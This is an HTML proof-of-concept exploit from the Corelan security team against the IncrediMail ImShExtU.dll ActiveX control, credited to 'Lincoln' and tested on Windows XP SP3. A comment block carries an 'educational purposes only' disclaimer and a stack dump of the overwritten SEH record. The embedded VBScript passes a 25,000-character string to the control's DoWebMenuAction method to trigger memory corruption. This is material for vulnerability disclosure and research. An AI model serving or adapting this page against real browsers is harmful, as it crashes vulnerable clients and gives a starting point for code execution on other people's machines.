<html>
<!--
|------------------------------------------------------------------|
| __ __|
| _________________/ /___ _____ / /________ _____ ___|
|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|
||
| http://www.corelan.be:8800 |
|security@corelan.be |
||
|-------------------------------------------------[ EIP Hunters ]--|
# Software: Incredimail (ImShExtU.dll)
# Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-038
# Author: Lincoln
# OS: Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln: SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#0013F1A4 41414141AAAA
#0013F1A8 41414141AAAA
#0013F1AC 41414141AAAAPointer to next SEH record
#0013F1B0 41414141AAAASE handler
#0013F1B4 41414141AAAA
#0013F1B8 41414141AAAA
#
-->
<object classid='clsid:F8984111-38B6-11D5-8725-0050DA2761C4' id='target' ></object>
<script language='vbscript'>
crash=String(25000, "A")
target.DoWebMenuAction crash
</script>
<b><center>IncrediMail ImShExtU.dll ActiveX Memory Corruption</b></center>
</html>